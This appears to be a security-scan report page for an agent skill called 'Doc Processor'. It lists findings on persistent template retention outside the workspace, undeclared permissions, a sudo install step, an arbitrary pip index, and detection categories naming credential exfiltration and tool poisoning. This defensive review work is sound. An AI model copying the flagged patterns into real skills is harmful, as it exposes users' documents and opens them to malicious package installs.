ClawHub

Doc Processor

Security checks across malware telemetry and agentic risk

Overview

This document-processing skill is mostly local and purpose-aligned, but it can persist user documents/templates outside the active workspace while its security documentation understates that behavior.

Install only if you are comfortable with local document/template retention. Avoid using the generate/template-history features with confidential documents unless you manage or delete the user-templates directory, review the pip index before running setup.sh, and run privileged package-manager commands only from trusted system repositories.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Taint TrackingDirect Taint Flow, Variable-Mediated Taint Flow, Credential Exfiltration Chain
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (9)

Tainted flow: 'saved_path' from pathlib.Path.read_bytes (line 1501, file read) → shutil.copy2 (file write)

Medium
Category
Data Flow
Content
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        template_id = f"tpl_{timestamp}_{file_hash}"
        saved_path = self.user_template_dir / "templates" / f"{template_id}{template.suffix}"
        shutil.copy2(template, saved_path)
        content_type = self._infer_content_type_from_request(user_request)
        template_info = TemplateInfo(path=str(saved_path), style=StyleDefinition(), content_type=content_type, usage_count=1, last_used=datetime.now().isoformat())
        self._update_registry(template_info)
Confidence
84% confidence
Finding
shutil.copy2(template, saved_path)

Tainted flow: 'saved_path' from pathlib.Path.read_bytes (line 1501, file read) → shutil.copy2 (file write)

Medium
Category
Data Flow
Content
template = Path(output_path)
        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        saved_path = self.user_template_dir / "templates" / f"{timestamp}_auto.docx"
        shutil.copy2(template, saved_path)
        content_type = self._infer_content_type_from_request(user_request)
        template_info = TemplateInfo(path=str(saved_path), style=StyleDefinition(), content_type=content_type, usage_count=1, last_used=datetime.now().isoformat())
        self._update_registry(template_info)
Confidence
87% confidence
Finding
shutil.copy2(template, saved_path)

Lp3

Medium
Category
MCP Least Privilege
Confidence
87% confidence
Finding
The skill advertises installation steps and functionality that require shell execution, file read/write, environment-variable use, and network access for dependency installation, yet no permissions are declared. This creates a transparency and policy-enforcement gap: users and the platform cannot accurately assess or constrain what the skill may do before use.

Tp4

High
Category
MCP Tool Poisoning
Confidence
79% confidence
Finding
The skill claims to be focused on local document processing and emphasizes that AI/network features were removed, but the documented behavior still includes template registry management, historical-template matching, PDF generation, batch processing, and pip-based downloads from network sources. This mismatch can mislead reviewers and users about the actual attack surface, especially around persistent local data handling and external package retrieval.

Description-Behavior Mismatch

Medium
Confidence
80% confidence
Finding
The skill metadata says AI functionality was removed and the skill is focused on document processing, yet the code still performs request analysis, template matching, and persistent template management. In security-sensitive agent systems, this hidden functional expansion matters because it changes data retention and profiling behavior beyond what operators may expect or approve.

Context-Inappropriate Capability

Medium
Confidence
88% confidence
Finding
The processor creates and maintains a `user-templates` directory outside the workspace, establishing persistent storage for templates and registry data unrelated to a single document-processing operation. In an agent skill, writing outside the declared workspace weakens isolation boundaries and can lead to unexpected cross-task data leakage, retention, and policy violations.

Intent-Code Divergence

Medium
Confidence
88% confidence
Finding
The script claims packages come from official PyPI or trusted mirrors, but it accepts an arbitrary package index from PIP_INDEX_URL or the first command-line argument. This allows dependency installation from attacker-controlled repositories, enabling malicious package delivery or dependency confusion if a user runs the installer in a manipulated environment or with untrusted parameters.

Missing User Warnings

Medium
Confidence
82% confidence
Finding
The README documents automatic saving and learning from user-provided templates without clearly warning that user documents may be persisted locally under a workspace path. In a document-processing skill, templates can contain sensitive business, legal, financial, or personal data, so silent retention increases the risk of unintended disclosure, over-retention, and cross-user data exposure on shared systems.

Sudo/Root Execution

Medium
Category
Privilege Escalation
Content
platforms: ["darwin"]
      - id: apt-poppler
        kind: system
        command: "sudo apt install -y poppler-utils"
        bins: ["pdftotext", "pdfinfo"]
        label: "Install poppler-utils (apt)"
        platforms: ["linux"]
Confidence
76% confidence
Finding
sudo

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal